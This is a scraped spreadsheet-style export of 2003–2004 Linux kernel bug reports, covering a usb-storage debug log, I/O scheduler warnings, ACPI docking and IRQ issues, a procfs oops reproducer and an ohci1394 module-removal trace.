usb-storage: Call to usb_stor_ctrl_transfer() returned 0 usb-storage: -- CB transport device requiring auto-sense usb-storage: Issuing auto-REQUEST_SENSE usb-storage: usb_stor_ctrl_transfer: rq=00 rqtype=21 value=0000 index=00 len=6 usb-storage: Status code 0; transferred 6/6 usb-storage: -- transfer complete usb-storage: Call to usb_stor_ctrl_transfer() returned 0 usb-storage: usb_stor_bulk_transfer_buf: xfer 18 bytes usb-storage: Status code 0; transferred 18/18 usb-storage: -- transfer complete usb-storage: CB data stage result is 0x0 usb-storage: -- Result from auto-sense is 0 usb-storage: -- code: 0x70, key: 0x0, ASC: 0x0, ASCQ: 0x0 usb-storage: (Unknown Key): (unknown ASC/ASCQ) usb-storage: scsi cmd done, result=0x0 usb-storage: *** thread sleeping. usb-storage: queuecommand called usb-storage: *** thread awakened. usb-storage: Command READ_CAPACITY (10 bytes) usb-storage: 25 00 00 00 00 00 00 00 00 00 usb-storage: usb_stor_ctrl_transfer: rq=00 rqtype=21 value=0000 index=00 len=10 usb-storage: Status code 0; transferred 10/10 usb-storage: -- transfer complete usb-storage: Call to usb_stor_ctrl_transfer() returned 0 usb-storage: usb_stor_bulk_transfer_buf: xfer 8 bytes usb-storage: Status code 0; transferred 8/8 usb-storage: -- transfer complete usb-storage: CB data stage result is 0x0 usb-storage: -- CB transport device requiring auto-sense usb-storage: Issuing auto-REQUEST_SENSE usb-storage: usb_stor_ctrl_transfer: rq=00 rqtype=21 value=0000 index=00 len=6 usb-storage: Status code 0; transferred 6/6 usb-storage: -- transfer complete usb-storage: Call to usb_stor_ctrl_transfer() returned 0 usb-storage: usb_stor_bulk_transfer_buf: xfer 18 bytes usb-storage: Status code 0; transferred 18/18 usb-storage: -- transfer complete usb-storage: CB data stage result is 0x0 usb-storage: -- Result from auto-sense is 0 usb-storage: -- code: 0x70, key: 0x0, ASC: 0x0, ASCQ: 0x0 usb-storage: (Unknown Key): (unknown ASC/ASCQ) usb-storage: scsi cmd done, result=0x0 usb-storage: *** thread sleeping. SCSI device sda: 126848 512-byte hdwr sectors (65 MB) usb-storage: queuecommand called usb-storage: *** thread awakened. usb-storage: Command MODE_SENSE_10 (10 bytes) usb-storage: 5a 00 3f 00 00 00 00 00 08 00 usb-storage: usb_stor_ctrl_transfer: rq=00 rqtype=21 value=0000 index=00 len=10 usb-storage: Status code 0; transferred 10/10 usb-storage: -- transfer complete usb-storage: Call to usb_stor_ctrl_transfer() returned 0 usb-storage: usb_stor_bulk_transfer_buf: xfer 8 bytes usb-storage: Status code -75; transferred 8/8 usb-storage: -- babble usb-storage: CB data stage result is 0x3 usb-storage: -- transport indicates error, resetting usb-storage: usb_stor_CB_reset called usb-storage: usb_stor_control_msg: rq=00 rqtype=21 value=0000 index=00 len=12 usb-storage: Soft reset failed: -32 usb-storage: scsi cmd done, result=0x70000 usb-storage: *** thread sleeping. usb-storage: queuecommand called usb-storage: *** thread awakened. usb-storage: Command MODE_SENSE_10 (10 bytes) usb-storage: 5a 00 3f 00 00 00 00 00 08 00 usb-storage: usb_stor_ctrl_transfer: rq=00 rqtype=21 value=0000 index=00 len=10 usb-storage: Status code 0; transferred 10/10 usb-storage: -- transfer complete usb-storage: Call to usb_stor_ctrl_transfer() returned 0 usb-storage: usb_stor_bulk_transfer_buf: xfer 8 bytes usb-storage: Status code -75; transferred 8/8 usb-storage: -- babble usb-storage: CB data stage result is 0x3 usb-storage: -- transport indicates error, resetting usb-storage: usb_stor_CB_reset called usb-storage: usb_stor_control_msg: rq=00 rqtype=21 value=0000 index=00 len=12 usb-storage: Soft reset failed: -32 usb-storage: scsi cmd done, result=0x70000 usb-storage: *** thread sleeping. usb-storage: queuecommand called usb-storage: *** thread awakened. usb-storage: Command MODE_SENSE_10 (10 bytes) usb-storage: 5a 00 3f 00 00 00 00 00 08 00 usb-storage: usb_stor_ctrl_transfer: rq=00 rqtype=21 value=0000 index=00 len=10 usb-storage: Status code 0; transferred 10/10 usb-storage: -- transfer complete usb-storage: Call to usb_stor_ctrl_transfer() returned 0 usb-storage: usb_stor_bulk_transfer_buf: xfer 8 bytes usb-storage: Status code -75; transferred 8/8 usb-storage: -- babble usb-storage: CB data stage result is 0x3 usb-storage: -- transport indicates error, resetting usb-storage: usb_stor_CB_reset called usb-storage: usb_stor_control_msg: rq=00 rqtype=21 value=0000 index=00 len=12 usb-storage: Soft reset failed: -32 usb-storage: scsi cmd done, result=0x70000 usb-storage: *** thread sleeping. usb-storage: queuecommand called usb-storage: *** thread awakened. usb-storage: Command MODE_SENSE_10 (10 bytes) usb-storage: 5a 00 3f 00 00 00 00 00 08 00 usb-storage: usb_stor_ctrl_transfer: rq=00 rqtype=21 value=0000 index=00 len=10 usb-storage: Status code 0; transferred 10/10 usb-storage: -- transfer complete usb-storage: Call to usb_stor_ctrl_transfer() returned 0 usb-storage: usb_stor_bulk_transfer_buf: xfer 8 bytes usb-storage: Status code -75; transferred 8/8 usb-storage: -- babble usb-storage: CB data stage result is 0x3 usb-storage: -- transport indicates error, resetting usb-storage: usb_stor_CB_reset called usb-storage: usb_stor_control_msg: rq=00 rqtype=21 value=0000 index=00 len=12 usb-storage: Soft reset failed: -32 usb-storage: scsi cmd done, result=0x70000 usb-storage: *** thread sleeping. usb-storage: queuecommand called usb-storage: *** thread awakened. usb-storage: Command MODE_SENSE_10 (10 bytes) usb-storage: 5a 00 3f 00 00 00 00 00 08 00 usb-storage: usb_stor_ctrl_transfer: rq=00 rqtype=21 value=0000 index=00 len=10 usb-storage: Status code 0; transferred 10/10 usb-storage: -- transfer complete usb-storage: Call to usb_stor_ctrl_transfer() returned 0 usb-storage: usb_stor_bulk_transfer_buf: xfer 8 bytes usb-storage: Status code -75; transferred 8/8 usb-storage: -- babble usb-storage: CB data stage result is 0x3 usb-storage: -- transport indicates error, resetting usb-storage: usb_stor_CB_reset called usb-storage: usb_stor_control_msg: rq=00 rqtype=21 value=0000 index=00 len=12 usb-storage: Soft reset failed: -32 usb-storage: scsi cmd done, result=0x70000 usb-storage: *** thread sleeping. sda: Write Protect is off sda: Mode Sense: 00 32 00 00 sda: assuming drive cache: write through /dev/scsi/host4/bus0/target0/lun0:&lt;3&gt;Buffer I/O error on device sda, logical block 0 Buffer I/O error on device sda, logical block 0 Buffer I/O error on device sda, logical block 15855 Buffer I/O error on device sda, logical block 15855 Buffer I/O error on device sda, logical block 0 ldm_validate_partition_table(): Disk read failed. Buffer I/O error on device sda, logical block 0 unable to read partition table /dev/scsi/host4/bus0/target0/lun0:&lt;3&gt;Buffer I/O error on device sda, logical block 0 Buffer I/O error on device sda, logical block 15855 Buffer I/O error on device sda, logical block 0 ldm_validate_partition_table(): Disk read failed. Buffer I/O error on device sda, logical block 0 unable to read partition table Attached scsi removable disk sda at scsi4, channel 0, id 0, lun 0 Attached scsi generic sg1 at scsi4, channel 0, id 0, lun 0, type 0 usb-storage: queuecommand called usb-storage: *** thread awakened. usb-storage: Bad target number (1:0) usb-storage: scsi cmd done, result=0x40000 usb-storage: *** thread sleeping. usb-storage: queuecommand called usb-storage: *** thread awakened. usb-storage: Bad target number (2:0) usb-storage: scsi cmd done, result=0x40000 usb-storage: *** thread sleeping. usb-storage: queuecommand called usb-storage: *** thread awakened. usb-storage: Bad target number (3:0) usb-storage: scsi cmd done, result=0x40000 usb-storage: *** thread sleeping. usb-storage: queuecommand called usb-storage: *** thread awakened. usb-storage: Bad target number (4:0) usb-storage: scsi cmd done, result=0x40000 usb-storage: *** thread sleeping. usb-storage: queuecommand called usb-storage: *** thread awakened. usb-storage: Bad target number (5:0) usb-storage: scsi cmd done, result=0x40000 usb-storage: *** thread sleeping. usb-storage: queuecommand called usb-storage: *** thread awakened. usb-storage: Bad target number (6:0) usb-storage: scsi cmd done, result=0x40000 usb-storage: *** thread sleeping. usb-storage: queuecommand called usb-storage: *** thread awakened. usb-storage: Bad target number (7:0) usb-storage: scsi cmd done, result=0x40000 usb-storage: *** thread sleeping. WARNING: USB Mass Storage data integrity not assured USB Mass Storage device found at 7</t>
  </si>
  <si>
    <t>Krisztian Mark Szentes</t>
  </si>
  <si>
    <t>Badness in alloc_as_io_context</t>
  </si>
  <si>
    <t>2.6.0-test6-mm4</t>
  </si>
  <si>
    <t>2003-11-17 14:48 UTC</t>
  </si>
  <si>
    <t>Chung-chieh Shan</t>
  </si>
  <si>
    <t>2004-12-01 08:31 UTC</t>
  </si>
  <si>
    <t>Hello, I use a Debian unstable desktop system with a SCSI hard drive (no IDE). Under high disk I/O load, I get the following kernel error messages: Badness in alloc_as_io_context at drivers/block/as-iosched.c:202 Call Trace: [alloc_as_io_context+202/208] alloc_as_io_context+0xca/0xd0 [as_get_io_context+53/80] as_get_io_context+0x35/0x50 [as_add_request+62/528] as_add_request+0x3e/0x210 [__elv_add_request+41/64] __elv_add_request+0x29/0x40 [__make_request+728/1424] __make_request+0x2d8/0x590 [generic_make_request+261/400] generic_make_request+0x105/0x190 [bio_alloc+215/464] bio_alloc+0xd7/0x1d0 [submit_bio+61/128] submit_bio+0x3d/0x80 [ll_rw_block+109/144] ll_rw_block+0x6d/0x90 [ext3_find_entry+938/1056] ext3_find_entry+0x3aa/0x420 [d_alloc+33/464] d_alloc+0x21/0x1d0 [ext3_lookup+65/208] ext3_lookup+0x41/0xd0 [real_lookup+213/256] real_lookup+0xd5/0x100 [do_lookup+150/176] do_lookup+0x96/0xb0 [link_path_walk+1199/2336] link_path_walk+0x4af/0x920 [open_exec+39/240] open_exec+0x27/0xf0 [find_get_page+44/96] find_get_page+0x2c/0x60 [do_execve+56/608] do_execve+0x38/0x260 [do_no_page+548/1008] do_no_page+0x224/0x3f0 [handle_mm_fault+290/464] handle_mm_fault+0x122/0x1d0 [recalc_task_prio+168/464] recalc_task_prio+0xa8/0x1d0 [do_page_fault+828/1410] do_page_fault+0x33c/0x582 [do_sigaction+387/624] do_sigaction+0x183/0x270 [sys_rt_sigaction+254/288] sys_rt_sigaction+0xfe/0x120 [getname+152/208] getname+0x98/0xd0 [sys_execve+66/128] sys_execve+0x42/0x80 [sysenter_past_esp+67/101] sysenter_past_esp+0x43/0x65 Here is another one: Badness in alloc_as_io_context at drivers/block/as-iosched.c:202 Call Trace: [alloc_as_io_context+202/208] alloc_as_io_context+0xca/0xd0 [as_get_io_context+53/80] as_get_io_context+0x35/0x50 [as_add_request+62/528] as_add_request+0x3e/0x210 [as_merge+341/448] as_merge+0x155/0x1c0 [__elv_add_request+41/64] __elv_add_request+0x29/0x40 [__make_request+728/1424] __make_request+0x2d8/0x590 [generic_make_request+261/400] generic_make_request+0x105/0x190 [buffered_rmqueue+211/400] buffered_rmqueue+0xd3/0x190 [submit_bio+61/128] submit_bio+0x3d/0x80 [mpage_bio_submit+35/64] mpage_bio_submit+0x23/0x40 [mpage_readpage+74/80] mpage_readpage+0x4a/0x50 [ext3_get_block+0/160] ext3_get_block+0x0/0xa0 [do_generic_mapping_read+670/1264] do_generic_mapping_read+0x29e/0x4f0 [ext3_get_block+0/160] ext3_get_block+0x0/0xa0 [do_wp_page+490/944] do_wp_page+0x1ea/0x3b0 [file_read_actor+0/240] file_read_actor+0x0/0xf0 [__generic_file_aio_read+507/560] __generic_file_aio_read+0x1fb/0x230 [file_read_actor+0/240] file_read_actor+0x0/0xf0 [generic_file_aio_read+55/64] generic_file_aio_read+0x37/0x40 [do_sync_read+177/224] do_sync_read+0xb1/0xe0 [pgd_alloc+63/192] pgd_alloc+0x3f/0xc0 [autoremove_wake_function+0/80] autoremove_wake_function+0x0/0x50 [mm_init+149/208] mm_init+0x95/0xd0 [vfs_read+184/304] vfs_read+0xb8/0x130 [kernel_read+78/96] kernel_read+0x4e/0x60 [prepare_binprm+186/208] prepare_binprm+0xba/0xd0 [do_execve+350/608] do_execve+0x15e/0x260 [sys_execve+66/128] sys_execve+0x42/0x80 [sysenter_past_esp+67/101] sysenter_past_esp+0x43/0x65 Finally, here is a third one: Badness in get_io_context at drivers/block/ll_rw_blk.c:2677 Call Trace: [get_io_context+206/208] get_io_context+0xce/0xd0 [get_request+43/672] get_request+0x2b/0x2a0 [__make_request+267/1424] __make_request+0x10b/0x590 [generic_make_request+261/400] generic_make_request+0x105/0x190 [buffered_rmqueue+211/400] buffered_rmqueue+0xd3/0x190 [submit_bio+61/128] submit_bio+0x3d/0x80 [mpage_bio_submit+35/64] mpage_bio_submit+0x23/0x40 [mpage_readpage+74/80] mpage_readpage+0x4a/0x50 [ext3_get_block+0/160] ext3_get_block+0x0/0xa0 [do_generic_mapping_read+670/1264] do_generic_mapping_read+0x29e/0x4f0 [ext3_get_block+0/160] ext3_get_block+0x0/0xa0 [recalc_task_prio+168/464] recalc_task_prio+0xa8/0x1d0 [file_read_actor+0/240] file_read_actor+0x0/0xf0 [__generic_file_aio_read+507/560] __generic_file_aio_read+0x1fb/0x230 [file_read_actor+0/240] file_read_actor+0x0/0xf0 [autoremove_wake_function+39/80] autoremove_wake_function+0x27/0x50 [generic_file_aio_read+55/64] generic_file_aio_read+0x37/0x40 [do_sync_read+177/224] do_sync_read+0xb1/0xe0 [pgd_alloc+63/192] pgd_alloc+0x3f/0xc0 [autoremove_wake_function+0/80] autoremove_wake_function+0x0/0x50 [update_process_times+68/80] update_process_times+0x44/0x50 [update_wall_time+22/64] update_wall_time+0x16/0x40 [do_timer+224/240] do_timer+0xe0/0xf0 [do_timer_interrupt+27/272] do_timer_interrupt+0x1b/0x110 [vfs_read+184/304] vfs_read+0xb8/0x130 [kernel_read+78/96] kernel_read+0x4e/0x60 [prepare_binprm+186/208] prepare_binprm+0xba/0xd0 [do_execve+350/608] do_execve+0x15e/0x260 [sys_execve+66/128] sys_execve+0x42/0x80 [sysenter_past_esp+67/101] sysenter_past_esp+0x43/0x65</t>
  </si>
  <si>
    <t>Lack ACPI docking station support - T30</t>
  </si>
  <si>
    <t>2.6.0-test9-bk21</t>
  </si>
  <si>
    <t>2003-11-17 17:37 UTC</t>
  </si>
  <si>
    <t>2006-02-15 10:44 UTC</t>
  </si>
  <si>
    <t>Kristen</t>
  </si>
  <si>
    <t>Distribution: Slackware 9.0 Hardware Environment: IBM T30 w/ Dock Problem Description: w/ ACPI patch from http://bugme.osdl.org/attachment.cgi?id=1361&amp;action=view, ACPI works when T30 started in dock; when undock button pressed, dock does not power down, but physical lock is released. After removing T30, dock does power down. When T30 is put back into dock (hotdocked), machine hard-locks. Steps to reproduce: Patch 2.6.0-test9-bk21 kernel with http://bugme.osdl.org/attachment.cgi?id=1361&amp;action=view , Start T30 in dock (w/ ACPI compiled and enabled in kernel); Press blue dock button to release physical docking lock. Remove T30; place T30 back into dock.</t>
  </si>
  <si>
    <t>oops in proc_kill_inodes when file rapidly added and removed</t>
  </si>
  <si>
    <t>2003-11-18 09:02 UTC</t>
  </si>
  <si>
    <t>Nathan Lynch</t>
  </si>
  <si>
    <t>2004-12-05 05:33 UTC</t>
  </si>
  <si>
    <t>Rapidly adding and removing a file in /proc can result in an oops in proc_kill_inodes, because the dentry in the following loop is sometimes NULL: list_for_each(p, &amp;sb-&gt;s_files) { struct file * filp = list_entry(p, struct file, f_list); struct dentry * dentry = filp-&gt;f_dentry; struct inode * inode; struct file_operations *fops; if (dentry-&gt;d_op != &amp;proc_dentry_operations) continue; inode = dentry-&gt;d_inode; if (PDE(inode) != de) continue; fops = filp-&gt;f_op; filp-&gt;f_op = NULL; fops_put(fops); } I have a simple testcase module which I will attach that can be used to reproduce the problem. The module creates a /proc/stress directory and a /proc/stress/ctl writable file. When "add" is written to /proc/stress/ctl, another file, /proc/stress/data, is created. When "remove" is written to /proc/stress/ctl, /proc/stress/data is removed. The procedure for producing the oops: 1. Load the procstress.ko module. 2. Execute a loop in a shell: while true ; do echo add &gt; /proc/stress/ctl echo remove &gt; /proc/stress/ctl done 3. In another shell, execute another loop: while true ; do cat /proc/cpuinfo &amp;&gt;/dev/null done Eventually, an oops similar to the following should occur (taken from a ppc64 system): Oops: Kernel access of bad area, sig: 11 [#1] NIP: C0000000000E6050 XER: 0000000000000000 LR: C0000000000E667C REGS: c0000000fe807880 TRAP: 0300 Not tainted MSR: 8000000000009032 EE: 1 PR: 0 FP: 0 ME: 1 IR/DR: 11 DAR: 0000000000000068, DSISR: 0000000040000000 TASK = c0000000fef2d840[680] 'bash' CPU: 1 GPR00: C0000000004E7900 C0000000FE807B00 C00000000061F000 C0000000FEF0B180 GPR04: C0000000FEF0B20B 0000000000000004 D00000000026149B 0000000000000000 GPR08: 0000000000000000 C0000000FECFACA0 C0000000FE6C6280 0000000000000000 GPR12: D000000000261338 C000000000550000 0000000000000000 0000000000000000 GPR16: 0000000000000000 0000000000000000 0000000000000000 0000000000000000 GPR20: 0000000000000001 C000000000550EC0 B000000000009032 C0000000FE807EA0 GPR24: 0000000000000000 0000000000000001 0000000000000000 0000000040015000 GPR28: C0000000FEF0B180 C0000000FFFC24F8 C00000000051A098 C0000000FE9E5C80 NIP [c0000000000e6050] .proc_kill_inodes+0xb0/0x1b0 Call Trace: [c0000000000e667c] .remove_proc_entry+0x11c/0x180 [d000000000261200] .write_procstress_ctl+0xdc/0x148 [procstress] [c00000000009fdb0] .vfs_write+0x10c/0x170 [c00000000009ff04] .sys_write+0x50/0xa0 [c0000000000117bc] .ret_from_syscall_1+0x0/0xa4 I have verified that the problem occurs on i386, too. I realize that this is not a "real world" test of procfs, but there is some ppc64 work in progress that can be made to exercise the system in the same way, with the same results. I wrote the procstress module in order to isolate the problem.</t>
  </si>
  <si>
    <t>Store(Local0, Local0) generates an error</t>
  </si>
  <si>
    <t>2003-11-18 12:37 UTC</t>
  </si>
  <si>
    <t>2006-09-28 13:15 UTC</t>
  </si>
  <si>
    <t>Distribution: ACPI-CA Hardware Environment: any Software Environment: any Problem Description: Sometime around 0619, executing an opcode of Store(Local0, Local0) started generating an error instead of just being a no-op. In reading the 2.0c spec, there is no evidence that this is an illegal operation. Could someone restore the previous behavior? What part of ACPICA handles the Store opcode? Here's a snippet of ASL from my BP6 (this change breaks access to the floppy drive: Device(FDC0) { Method(_CRS) { Name(BUF0, Buffer(0x18) {0x47, 0x1, 0xf2, 0x3, 0xf2, 0x3, 0x 1, 0x4, 0x47, 0x1, 0xf7, 0x3, 0xf7, 0x3, 0x1, 0x1, 0x22, 0x40, 0x0, 0x2a, 0x4, 0 x0, 0x79, 0x0 }) Store(Local0, Local0) Return(BUF0) } } On Fri, 3 Oct 2003, Moore, Robert wrote: &gt; I will re-address this issue (in the case where Local0 is &gt; uninitialized.)</t>
  </si>
  <si>
    <t>acpi=off mess /proc</t>
  </si>
  <si>
    <t>2003-11-18 23:47 UTC</t>
  </si>
  <si>
    <t>2004-04-13 23:32 UTC</t>
  </si>
  <si>
    <t>add acpi=off to boot parameter. should no acpi related proc files exist but 2.6 kernel can't do this.</t>
  </si>
  <si>
    <t>SCSI Driver does not load after compiling/rebooting 2.6-test5 kernel on xSeries 343</t>
  </si>
  <si>
    <t>2003-11-19 15:33 UTC</t>
  </si>
  <si>
    <t>Sonya Johnson</t>
  </si>
  <si>
    <t>Distribution: 2.6-test5 Hardware Environment: xSeries 343 Software Environment:2.6-test5 Problem Description: After rebooting from compiling the 2.6-test5 kernel on an xSeries 343 with a scsi drive and error occurs. The following error is displayed: VFS: Cannot open device "sda3" or unknown-block(0,0) Pleae append a correct "root=boot" option Kernel panic: VFS unable to mount root fs on unknown block (0,0) This happens with the 2.6-test5 kernel and on the xSeries 343. It work just fines for 2.4-18 using the same driver. I also tried it on an xSeries 330 with the same driver and it works just fine too. The driver is the Adaptec AIC7xxx support (old driver). The lspci information shows the following: 01:07.0 SCSI storage controller: Adaptec AIC-7899P U160/m (rev 01) 01:07.1 SCSI storage controller: Adaptec AIC-7899P U160/m (rev 01 Steps to reproduce: 1. Install/Compile the 2.6-test5 kernel 2. Reboot the machine</t>
  </si>
  <si>
    <t>No ACPI events in IO-APIC mode, PIC mode works -- VIA694</t>
  </si>
  <si>
    <t>2003-11-19 19:06 UTC</t>
  </si>
  <si>
    <t>2004-03-04 12:43 UTC</t>
  </si>
  <si>
    <t>After I just got a fixed DSDT for my motherboard (Rioworks SDVIA) from Shaohua Li, everything on my MB finally started working as it should :) (see bug http://bugme.osdl.org/show_bug.cgi?id=1164 ) But the power-button doesn't generate any ACPI-events. If I boot with noapic, the power-button works just fine.</t>
  </si>
  <si>
    <t>irq5: nobody cared, when card enabled in 2nd yenta slot</t>
  </si>
  <si>
    <t>2003-11-19 22:47 UTC</t>
  </si>
  <si>
    <t>2004-05-19 01:13 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: IBM T40 Software Environment: 2.6-test9 Problem Description: insert a PCMCIA netcard in one of cardbus slot, try up the netcard, then report a call trace: irq5 nobody cared.</t>
  </si>
  <si>
    <t>2.6.0-test9-mm4</t>
  </si>
  <si>
    <t>rmmod ohci1394: sleeping function called from invalid context</t>
  </si>
  <si>
    <t>2003-11-20 14:13 UTC</t>
  </si>
  <si>
    <t>Eric Buddington</t>
  </si>
  <si>
    <t>2004-02-06 06:31 UTC</t>
  </si>
  <si>
    <t>Distribution: home-rolled Hardware Environment: VIA Technologies, In IEEE 1394 Host Contr (rev 70). Software Environment: module-init-tools version 0.9.14 Problem Description: ieee1394: received packet: 01e87fa0 c9007800 ffff0080 ed76979b ohci1394_0: IntEvent: 00000080 Debug: sleeping function called from invalid context at kernel/sched.c:1736 in_atomic():1, irqs_disabled():0 Call Trace: [&lt;c011ff3b&gt;] __might_sleep+0xab/0xf0 [&lt;c011ed1f&gt;] wait_for_completion+0x1f/0xe0 [&lt;c012c236&gt;] group_send_sig_info+0x1b6/0x3c0 [&lt;c012c61b&gt;] kill_proc_info+0x5b/0x60 [&lt;d0bbd5c5&gt;] nodemgr_remove_host+0x55/0x90 [ieee1394] [&lt;d0bb8f55&gt;] highlevel_remove_host+0x75/0x90 [ieee1394] [&lt;d0b5052e&gt;] ohci1394_pci_remove+0x3e/0x230 [ohci1394] [&lt;c0231c09&gt;] pci_device_remove+0x39/0x40 [&lt;c0288810&gt;] device_release_driver+0x60/0x70 [&lt;c0288842&gt;] driver_detach+0x22/0x40 [&lt;c0288ae5&gt;] bus_remove_driver+0x55/0x90 [&lt;c0288efa&gt;] driver_unregister+0x1a/0x42 [&lt;c0231dc7&gt;] pci_unregister_driver+0x17/0x30 [&lt;d0b509e2&gt;] ohci1394_cleanup+0x12/0x14 [ohci1394] [&lt;c01374a7&gt;] sys_delete_module+0x127/0x1a0 [&lt;c014f217&gt;] sys_munmap+0x57/0x80 [&lt;c010a36f&gt;] syscall_call+0x7/0xb bad: scheduling while atomic! Call Trace: [&lt;c011ea2d&gt;] schedule+0x56d/0x580 [&lt;c010a36f&gt;] syscall_call+0x7/0xb [&lt;c010b0fe&gt;] dump_stack+0x1e/0x20 [&lt;c011ff3b&gt;] __might_sleep+0xab/0xf0 [&lt;c011ed88&gt;] wait_for_completion+0x88/0xe0 [&lt;c011ea90&gt;] default_wake_function+0x0/0x30 [&lt;c011ea90&gt;] default_wake_function+0x0/0x30 [&lt;c012c61b&gt;] kill_proc_info+0x5b/0x60 [&lt;d0bbd5c5&gt;] nodemgr_remove_host+0x55/0x90 [ieee1394] [&lt;d0bb8f55&gt;] highlevel_remove_host+0x75/0x90 [ieee1394] [&lt;d0b5052e&gt;] ohci1394_pci_remove+0x3e/0x230 [ohci1394] [&lt;c0231c09&gt;] pci_device_remove+0x39/0x40 [&lt;c0288810&gt;] device_release_driver+0x60/0x70 [&lt;c0288842&gt;] driver_detach+0x22/0x40 [&lt;c0288ae5&gt;] bus_remove_driver+0x55/0x90 [&lt;c0288efa&gt;] driver_unregister+0x1a/0x42 [&lt;c0231dc7&gt;] pci_unregister_driver+0x17/0x30 [&lt;d0b509e2&gt;] ohci1394_cleanup+0x12/0x14 [ohci1394] [&lt;c01374a7&gt;] sys_delete_module+0x127/0x1a0 [&lt;c014f217&gt;] sys_munmap+0x57/0x80 [&lt;c010a36f&gt;] syscall_call+0x7/0xb ieee1394: NodeMgr: Exiting thread bad: scheduling while atomic! Call Trace: [&lt;c011ea2d&gt;] schedule+0x56d/0x580 [&lt;c011eaba&gt;] default_wake_function+0x2a/0x30 [&lt;c011ed88&gt;] wait_for_completion+0x88/0xe0 [&lt;c011ea90&gt;] default_wake_function+0x0/0x30 [&lt;c011ea90&gt;] default_wake_function+0x0/0x30 [&lt;c0131b97&gt;] queue_work+0x97/0xb0 [&lt;c0131ae9&gt;] call_usermodehelper+0xa9/0xc0 [&lt;c01319e0&gt;] __call_usermodehelper+0x0/0x60 [&lt;d0bbc76f&gt;] nodemgr_hotplug+0x1af/0x1f0 [ieee1394] [&lt;c022743d&gt;] kset_hotplug+0x20d/0x270 [&lt;c0227897&gt;] kobject_del+0x67/0x70 [&lt;c02877e1&gt;] __crc_pnp_add_card_device+0x5/0x34 [&lt;c0287824&gt;] device_unregister+0x14/0x20 [&lt;d0bbb4f2&gt;] nodemgr_remove_node_uds+0x22/0x40 [ieee1394] [&lt;d0bbb528&gt;] nodemgr_remove_ne+0x18/0x70 [ieee1394] [&lt;d0bbb5a3&gt;] nodemgr_remove_host_dev+0x23/0x90 [ieee1394] [&lt;d0bbd5cd&gt;] nodemgr_remove_host+0x5d/0x90 [ieee1394] [&lt;d0bb8f55&gt;] highlevel_remove_host+0x75/0x90 [ieee1394] [&lt;d0b5052e&gt;] ohci1394_pci_remove+0x3e/0x230 [ohci1394] [&lt;c0231c09&gt;] pci_device_remove+0x39/0x40 [&lt;c0288810&gt;] device_release_driver+0x60/0x70 [&lt;c0288842&gt;] driver_detach+0x22/0x40 [&lt;c0288ae5&gt;] bus_remove_driver+0x55/0x90 [&lt;c0288efa&gt;] driver_unregister+0x1a/0x42 [&lt;c0231dc7&gt;] pci_unregister_driver+0x17/0x30 [&lt;d0b509e2&gt;] ohci1394_cleanup+0x12/0x14 [ohci1394] [&lt;c01374a7&gt;] sys_delete_module+0x127/0x1a0 [&lt;c014f217&gt;] sys_munmap+0x57/0x80 [&lt;c010a36f&gt;] syscall_call+0x7/0xb Device 'fw-host0' does not have a release() function, it is broken and must be f ixed. Badness in device_release at drivers/base/core.c:87 Call Trace: [&lt;c0287431&gt;] device_release+0x71/0x80 [&lt;c0227985&gt;] kobject_cleanup+0x75/0x80 [&lt;d0bb8f55&gt;] highlevel_remove_host+0x75/0x90 [ieee1394] [&lt;d0b5052e&gt;] ohci1394_pci_remove+0x3e/0x230 [ohci1394] [&lt;c0231c09&gt;] pci_device_remove+0x39/0x40 [&lt;c0288810&gt;] device_release_driver+0x60/0x70 [&lt;c0288842&gt;] driver_detach+0x22/0x40 [&lt;c0288ae5&gt;] bus_remove_driver+0x55/0x90 [&lt;c0288efa&gt;] driver_unregister+0x1a/0x42 [&lt;c0231dc7&gt;] pci_unregister_driver+0x17/0x30 [&lt;d0b509e2&gt;] ohci1394_cleanup+0x12/0x14 [ohci1394] [&lt;c01374a7&gt;] sys_delete_module+0x127/0x1a0 [&lt;c014f217&gt;] sys_munmap+0x57/0x80 [&lt;c010a36f&gt;] syscall_call+0x7/0xb ohci1394_0: Soft reset finished ohci1394_0: Freeing dma_rcv_ctx 0 ohci1394_0: Freeing dma_rcv_ctx 0 ohci1394_0: Freeing dma_trm_ctx 0 ohci1394_0: Freeing dma_trm_ctx 1 ohci1394_0: Freeing dma_rcv_ctx 0 Steps to reproduce: (not known to be reproducible) load dv1394, raw1394, chmod 666 /dev/raw1394 start dvgrab from Canon GL2 camera, then simutaneously start read from /dev/ieee1394/dv/host0/NTSC/in killall dvgrab and the reading process try to read again; hangs on read() rmmod raw1394, rmmod dv1394; rmmod ohci1394</t>
  </si>
  <si>
    <t>xconfig fails with latest ACPI patch</t>
  </si>
  <si>
    <t>2.4.22 + acpi-20031002-2.4.22.diff</t>
  </si>
  <si>
    <t>2003-11-20 18:58 UTC</t>
  </si>
  <si>
    <t>2004-03-04 19:53 UTC</t>
  </si>
  <si>
    <t>Marcel Meckel reported patched vanilla 2.4.22 kernel with acpi-20031002-2.4.22.diff, ran make xconfig. In menu "character devices" i see option "/dev/agpgart (AGP Support)" twice, one as bool one as tristate option. Without changing an option (and without .config of course) i get this error after pressing "Save and Exit" Button: Error in Tcl Script Error: can't read "CONFIG_SCSI": no such variable ERROR - Attempting to write value for unconfigured variable (CONFIG_PARPORT_PC_CML1). Stack trace says: can't read "CONFIG_SCSI": no such variable while executing "list $CONFIG_BLK_CPQ_CISS_DA $CONFIG_SCSI" (procedure "writeconfig" line 672) invoked from within "writeconfig .config include/linux/autoconf.h" invoked from within ".f0.right.save invoke" ("uplevel" body line 1) invoked from within "uplevel #0 [list $w invoke]" (procedure "tkButtonUp" line 7) invoked from within "tkButtonUp .f0.right.save " (command bound to event) Not necessary to say that this does not happen with vanilla kernel neighter with acpi-20030916-2.4.22.diff from sourceforge ftp. Checked this with acpi-20030918-2.4.22.diff too, same strange result.</t>
  </si>
  <si>
    <t>IRQ 27 on an ACPI IOAPIC system with 24 IRQs</t>
  </si>
  <si>
    <t>2003-11-21 00:20 UTC</t>
  </si>
  <si>
    <t>2004-04-12 22:19 UTC</t>
  </si>
  <si>
    <t>The ES7000 patch added some code to arch/i386/kernel/mpparse.c mp_parse_prt() ... if (!ioapic &amp;&amp; (irq &lt; 16)) irq += 16; What happens next depends on the configuration. The apic and the pin# are still correct. If the pin has been programmed already, then the side-effect is that entry-&gt;irq is set to the wrong number. If the pin needs to be programmed, then the bad irq# is used to index into the irq_2_pin. If it isn't used already, then the system will still work, though it may report an impossible IRQ for this interrupt. If that IRQ is already used, then you're probably going to have some confusion when the interrupt actually arrives...</t>
  </si>
  <si>
    <t>Carlos</t>
  </si>
  <si>
    <t>Linux displays only 1/4 of the screen with vesafb</t>
